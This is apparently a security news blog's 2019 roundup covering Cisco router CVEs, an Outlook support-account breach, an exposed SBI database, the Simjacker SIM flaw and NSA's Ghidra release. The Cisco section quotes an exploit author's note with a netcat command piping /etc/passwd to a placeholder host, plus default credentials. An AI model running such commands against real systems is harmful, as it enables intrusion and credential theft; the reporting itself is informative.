2019 is nearing its end. Over the year we have reported cyber security news and published tutorials.
According to our research, 2019 saw the highest number of data breaches ever: more than 4 billion breached records have been reported.
1. Cisco Routers Hacked By Using New Exploit
- CVE-2019-1653 – Allows a remote attacker to get sensitive device configuration details without a password.
- CVE-2019-1652 – Allows a remote attacker to inject and run admin commands on the device without a password.
The vulnerabilities allow for the following:
- Dumping (Plaintext) Configuration File! (includes hashes for the webUI!)
- Dumping (Encrypted) Diagnostic/Debug Files! (including config, and the /etc and /var directories)
- Decrypting the encrypted Diagnostic/Debug Files! (yes, you get /etc/shadow!)
- Post-Authentication Remote Command Injection as root in the webUI!
Post-Auth RCE Exploit
CVE-2019-1652 outlines a trivial shell command injection vulnerability, which requires authentication. exec_cmd.py implements this, assuming you have valid login creds. “cisco:cisco” is the default, but you could also crack some hashes.
The command injection is blind, so you won’t get any output. The environment is an incredibly limited Busybox setup with a crippled netcat, and the boxes are mips64, so I didn’t bother writing a reverse-shell exploit this time. You can, however, get command output by doing stuff like cat /etc/passwd | nc HOST PORT and having a listener running, or whatever.
2. Outlook Accounts Hacked – Microsoft Confirmed
Hackers compromised a Microsoft customer support account and accessed information from some Outlook email accounts.
Hackers accessed:
- Email addresses
- Folder names
- E-mail subject lines
They did not get access to email attachments.
“Our data indicates that account-related information (but not the content of any e-mails) could have been viewed, but Microsoft has no indication why that information was viewed or how it may have been used,” Microsoft said in the email.
“We have identified that a Microsoft support agent’s credentials were compromised, enabling individuals outside Microsoft to access information within your Microsoft email account.”
“Microsoft is committed to providing our customers with transparency. As part of maintaining this trust and commitment to you, we are informing you of a recent event that affected your Microsoft-managed email account.”
“Microsoft regrets any inconvenience caused by this issue,” the company says. “Please be assured that Microsoft takes data protection very seriously and has engaged its internal security and privacy teams in the investigation and resolution of the issue, as well as additional hardening of systems and processes to prevent such recurrence.”
3. State Bank Of India SBI Hacked – Customers Account Data Breached
- The SBI server database was not protected by a password.
- The unprotected server leaked millions of customers' account details.
- Security researchers were able to track customers' transaction details.
What happened with SBI?
The server stored data related to SBI Quick service. The server contained details of all messages sent to those SBI customers who subscribed for the service.
SBI Quick is a new method of digital banking that lets customers learn about their bank accounts and other financial details through SMS. Customers send commands or missed calls to the service to get the required information. It is useful for those who don’t have smartphones or access to Internet banking.
SBI claims more than 500 million customers across the globe with 740 million accounts.
Finally, the database has reportedly been fixed by the bank.
4. SIMJACKER Vulnerability – To Take Over Mobile Phones And Exploit SIM Cards
Wireless Internet Browser (WIB) SIM Kit Also Leads To SimJacker Attacks
Vulnerabilities in WIB SIM card browsers can let attackers anywhere in the world control the victim's mobile phone, make a phone call, send SMS and send the victim’s location.
According to Ginno Security Lab, the Wireless Internet Browser (WIB) is specified by SmartTrust and is one of the market-leading solutions for SIM toolkit based browsing. The impact of the vulnerabilities in WIB is worldwide and causes serious harm to millions of telecom subscribers.
By sending a malicious SMS to the victim's phone number, an attacker can abuse the vulnerabilities in the WIB SIM browser to remotely take control of the victim's mobile phone and perform harmful actions such as: send SMS, make a phone call, get the victim’s location, launch other browsers (e.g. a WAP browser), get the victim’s IMEI, etc.
The impact of the vulnerability in WIB is worldwide and puts hundreds of millions of telecom subscribers at risk. The security vulnerability comes from the SIM card and depends neither on the mobile phone device nor on the mobile phone operating system, so every mobile phone was affected.
The SIMJACKER vulnerability was found by AdaptiveMobile Security researchers. The vulnerability is currently being actively exploited by a specific private company that works with governments to monitor individuals.
The Simjacker vulnerability could extend to over 1 billion mobile phone users globally, potentially impacting countries in the Americas, West Africa, Europe, Middle East and indeed any region of the world where this SIM card technology is in use.
The researchers said they had observed real attacks against users with devices from nearly every manufacturer, including Apple, ZTE, Motorola, Samsung, Google, Huawei, and even IoT devices with SIM cards.
5. GHIDRA – Free Reverse Engineering Tool By NSA
The National Security Agency (NSA) released GHIDRA, a free reverse engineering tool.
Ghidra is a software reverse engineering (SRE) framework created and maintained by the National Security Agency Research Directorate. This framework includes a suite of full-featured, high-end software analysis tools that enable users to analyze compiled code on a variety of platforms including Windows, Mac OS, and Linux.
“If you’ve done software reverse engineering what you’ve found out is it’s both art and science, there’s not a hard path from the beginning to the end,” NSA cybersecurity advisor Rob Joyce said.
“Ghidra is a software reverse engineering tool built for our internal use at NSA. We’re not claiming that this is the one that’s going to be replacing everything out there—it’s not. But it helped us address some things in our work flow.”
According to our research, 2018 was the year of ransomware, and 2019 goes to data breaches.
Our prediction for 2020 is that hackers may attack mobile apps in the e-commerce and payment gateway categories. Companies should hire cyber security researchers or launch bug bounty programs to increase their network security.
Now, what is your cyber security prediction for 2020?